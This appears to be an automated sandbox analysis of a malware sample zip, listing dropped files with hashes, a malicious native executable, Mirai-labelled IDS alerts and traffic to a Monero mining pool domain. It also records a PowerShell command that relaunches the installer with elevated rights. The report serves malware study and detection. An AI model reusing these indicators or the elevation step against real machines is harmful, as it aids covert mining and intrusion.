SHA-512: CA42AC7BCDAC107A4EA0D783157262F1F99054A78B30ADB4719DD17C3B0A29753D8947F5654BD1C10A5EF55D321CD5A6E3FEE5ED9A76EC589F815C84CEE183B0
Malicious: false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\explorer.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 1280x1024, components 3
Category: dropped
Size (bytes): 67684
Entropy (8bit): 7.829930120723189
Encrypted: false
SSDEEP: 1536:IqjFspcGrjw2RAal82F5EwtJqF1WlDBGOFBbVEmX:Gprs2RARw5JqFoJnbhX
MD5: EA159C2DE67A1E14B2B715E8C3625C29
SHA1: 735CACF1A08F721CCBD16DF1819E9195E413C62F
SHA-256: 95D1E84E1C136E0FF2A78A422228475C503715F953B3D121E13E6EF60CE3E81D
SHA-512: E5C5FB77E448591C3AB72F9881A46DC36276CB5ED1D28427D8A13993752BEE7B6AC64E81AEA794C241680E087D39C192C6BF86033905A4E74049154CD0B3256D
Malicious: false
                                                                                                                                                                                                    Preview:......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....W.....*w.=i)p}i*...QL..6..i..6.v=.q@....Q@...E.2.R)(...).......N.6.6.Z.JF.m4P42.u7i.`h...%!..Mj....(..IKI@.(........m:..h((..P1.z.R.PPR5-.......M..QNjm2...m?i...OZm:...-5.....F..E.!..N&..HJm:..c.M.w..)...F.ch.....)Z.@.jJst..P.Mj}4.h..E:.M......i.....L.X.C....E9..Xh)..I.E.jkT..i.DGH..ILci......X..........Z..!.i.........6.k..z....?Zn._..{sI...>...).H~.1AC.
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):4926
                                                                                                                                                                                                    Entropy (8bit):3.246100818649046
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:FaqdF78F7B+AAHdKoqKFxcxkFiF7KaqdF7f+AAHdKoqKFxcxkFg:cEOB+AAsoJjykePEf+AAsoJjyk2
                                                                                                                                                                                                    MD5:D3DD0CF7FE3E07A7248B86C87F501E14
                                                                                                                                                                                                    SHA1:DE6EE697785CD73A7C9FE5401CDF6AADCF59E0CD
                                                                                                                                                                                                    SHA-256:35A063382FDD32A5A6AF8C8592389EE8B34929F940D858A310A74A997E0CDFE9
                                                                                                                                                                                                    SHA-512:B2EA0305E25B4F3A25FF0D7FA2FDCF3FE7165CC532E7F5DA4CC79EE6FC286C6552663849C35BC89E0BEE678A546D96F26EAC53A9B33E275466BA3552AD5B2AFD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.6. .. 2.0.2.3. .1.1.:.3.5.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):20884
                                                                                                                                                                                                    Entropy (8bit):5.471304084211427
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:ZMBrkgSJJpP36XhqaJrYItklgN5452YcR4Ct35cg4CvPnbculgqd:2r8dKXhqa1NtBHfRYTU/bcBqd
                                                                                                                                                                                                    MD5:0E3B9E8B8CD9F13D0BD8734650A51CA7
                                                                                                                                                                                                    SHA1:C7A8212D4A6875EA8F190376B196E0C6CFD21CF9
                                                                                                                                                                                                    SHA-256:9F1F119F31BC61A36627A892424173ED33422A3FA5907D089D22192BE707DFDE
                                                                                                                                                                                                    SHA-512:E2D6CE8C6D6E8111C62E8D79BA2A302C7257D61CB91BE28A35A484635332849B76D81E09B4C32F015963B5799519E718780F77FF1C4B8F5D03A385925549BF2E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:@...e........... ....................................@..........H...............o..b~.D.poM...P..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....`.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.{.....#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 42, DIRTY
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):1052672
                                                                                                                                                                                                    Entropy (8bit):0.43222994401471093
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:GfhHBiQk1bdzpFEVQCd3iDzJiLQKiDBi4k1bdzpFEVQ35yY3dik5pmik5pbik5po:0h0w+qLpBVi7CPIhMVlrF+tuV
                                                                                                                                                                                                    MD5:232006E5297B5EC13906C51D27668C28
                                                                                                                                                                                                    SHA1:B614403CC56FB9E58E869F44D3B6308885D2B059
                                                                                                                                                                                                    SHA-256:D0BE632B3993F5E23D76493E82C6E27846C5356D81E29D7A30A9C711589643B7
                                                                                                                                                                                                    SHA-512:CFA5136C006D80142DA3CB005C20299C54E6F7F98A1451408D344D7C9BDF0608E73847BB9B4A947A7552D49695BB92C5BAA026BC766F294E18A14B84E8088EF1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:ElfFile.................*....................................................................................................$@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):14544
Entropy (8bit):6.2660301556221185
Encrypted:false
SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:0C0195C48B6B8582FA6F6373032118DA
SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:
• Filename: jeNQRsRgBe.exe, Detection: malicious
• Filename: RemiTool v2.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exe, Detection: malicious
• Filename: Sms OTP Bypass.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win64.TrojanX-gen.27837.22565.exe, Detection: malicious
• Filename: xwizlLLNtX.exe, Detection: malicious
• Filename: gQZvXi6Osc.exe, Detection: malicious
• Filename: zLAr8hkDsu.exe, Detection: malicious
• Filename: udgE7Q3gs6.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

File type:Zip archive data, at least v2.0 to extract, compression method=deflate
Entropy (8bit):7.9999520848085055
TrID:
• ZIP compressed archive (8000/1) 100.00%
File name:MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip
File size:4'442'123 bytes
MD5:3384ccc27194a142f68c7ea1f157e2af
SHA1:32644f4bf6678db76c9968fb048c8b3f78bb30ae
SHA256:b892d9e7e59c6e61d99f8aeb1521b57567b821e10036d825648aebb66e754763
SHA512:b396e132fe49196635c9f575f6e6cdf4413378d2b7220537eecbe3a120c755c736f245ceda863a970fdca12630719113c224c3ca374df22aba8161510c5d46a4
SSDEEP:98304:RSsbQ+VoyemyiVJIAgAmbEg/a8uerMmYipUHr:EG3Vp15mWs5pUHr
TLSH:EF26339EE80A193A91DC20494D6CCC4936B456128CD7863F060B3E5BE6BABE7375533F
File Content Preview:PK........OgnXm.?.O.C...U...$.Setup.exe.. ..........6.P.v...6.P.v...6.P.v.........r.....D.....!.$...y....?Q.Y. ._.....B_F..R........G\.....J...2.X.=.^..f.."<w.i.t..z.<.......*.0|..T.u... t..........L..=..~.!..yb7..}....-+.;.yq.Jh.i..[..j.$.oW...hl.f.....r
Icon Hash:1c1c1e4e4ececedc
Snort IDS alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/14/24-13:56:00.164561 | TCP | 2841335 | ETPRO TROJAN ELF/Mirai Variant CnC Checkin | 59942 | 22 | 192.168.2.14 | 45.144.165.227
03/14/24-13:56:02.320789 | TCP | 2841335 | ETPRO TROJAN ELF/Mirai Variant CnC Checkin | 59948 | 22 | 192.168.2.14 | 45.144.165.227
03/14/24-13:56:00.878567 | TCP | 2841335 | ETPRO TROJAN ELF/Mirai Variant CnC Checkin | 59944 | 22 | 192.168.2.14 | 45.144.165.227
03/14/24-13:56:01.594395 | TCP | 2841335 | ETPRO TROJAN ELF/Mirai Variant CnC Checkin | 59946 | 22 | 192.168.2.14 | 45.144.165.227
TCP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 14, 2024 13:59:53.834031105 CET | 49704 | 10128 | 192.168.2.16 | 44.196.193.227
Mar 14, 2024 13:59:53.927774906 CET | 10128 | 49704 | 44.196.193.227 | 192.168.2.16
Mar 14, 2024 13:59:53.928154945 CET | 49704 | 10128 | 192.168.2.16 | 44.196.193.227
Mar 14, 2024 13:59:53.928154945 CET | 49704 | 10128 | 192.168.2.16 | 44.196.193.227
Mar 14, 2024 13:59:54.021955967 CET | 10128 | 49704 | 44.196.193.227 | 192.168.2.16
Mar 14, 2024 13:59:54.027618885 CET | 10128 | 49704 | 44.196.193.227 | 192.168.2.16
Mar 14, 2024 13:59:54.082479000 CET | 49704 | 10128 | 192.168.2.16 | 44.196.193.227
Mar 14, 2024 14:00:11.727569103 CET | 49696 | 80 | 192.168.2.16 | 72.21.81.240
Mar 14, 2024 14:00:11.727715015 CET | 49697 | 80 | 192.168.2.16 | 72.21.81.240
Mar 14, 2024 14:00:11.814764977 CET | 80 | 49696 | 72.21.81.240 | 192.168.2.16
Mar 14, 2024 14:00:11.814784050 CET | 80 | 49697 | 72.21.81.240 | 192.168.2.16
Mar 14, 2024 14:00:11.814843893 CET | 49696 | 80 | 192.168.2.16 | 72.21.81.240
Mar 14, 2024 14:00:11.814861059 CET | 49697 | 80 | 192.168.2.16 | 72.21.81.240
Mar 14, 2024 14:00:35.693918943 CET | 10128 | 49704 | 44.196.193.227 | 192.168.2.16
Mar 14, 2024 14:00:35.765631914 CET | 49704 | 10128 | 192.168.2.16 | 44.196.193.227
Mar 14, 2024 14:01:36.058617115 CET | 10128 | 49704 | 44.196.193.227 | 192.168.2.16
Mar 14, 2024 14:01:36.109761953 CET | 49704 | 10128 | 192.168.2.16 | 44.196.193.227
Mar 14, 2024 14:02:06.922986984 CET | 10128 | 49704 | 44.196.193.227 | 192.168.2.16
Mar 14, 2024 14:02:06.976794958 CET | 49704 | 10128 | 192.168.2.16 | 44.196.193.227
UDP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 14, 2024 13:59:53.720092058 CET | 55726 | 53 | 192.168.2.16 | 1.1.1.1
Mar 14, 2024 13:59:53.830224037 CET | 53 | 55726 | 1.1.1.1 | 192.168.2.16
DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 14, 2024 13:59:53.720092058 CET | 192.168.2.16 | 1.1.1.1 | 0x66c6 | Standard query (0) | gulf.moneroocean.stream | A (IP address) | IN (0x0001) | false
DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 14, 2024 13:59:53.830224037 CET | 1.1.1.1 | 192.168.2.16 | 0x66c6 | No error (0) | gulf.moneroocean.stream | monerooceans.stream | (none) | CNAME (Canonical name) | IN (0x0001) | false
Mar 14, 2024 13:59:53.830224037 CET | 1.1.1.1 | 192.168.2.16 | 0x66c6 | No error (0) | monerooceans.stream | (none) | 44.196.193.227 | A (IP address) | IN (0x0001) | false

Target ID:0
Start time:13:59:20
Start date:14/03/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Imagebase:0x7ff6a0810000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:13:59:25
Start date:14/03/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff62c440000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:13:59:31
Start date:14/03/2024
Path:C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe"
Imagebase:0x7ff605e50000
File size:5'614'592 bytes
MD5 hash:DF65134B0B2B2CC03F07647794B274E5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:4
Start time:13:59:31
Start date:14/03/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs
Imagebase:0x7ff7582a0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:13:59:31
Start date:14/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                    Start time:13:59:32
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                    Start time:13:59:32
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                                    Imagebase:0x7ff7648e0000
                                                                                                                                                                                                    File size:329'504 bytes
                                                                                                                                                                                                    MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                    Start time:13:59:32
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                    Start time:13:59:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                    Start time:13:59:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                    Start time:13:59:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                    Start time:13:59:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                    Start time:13:59:35
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe"
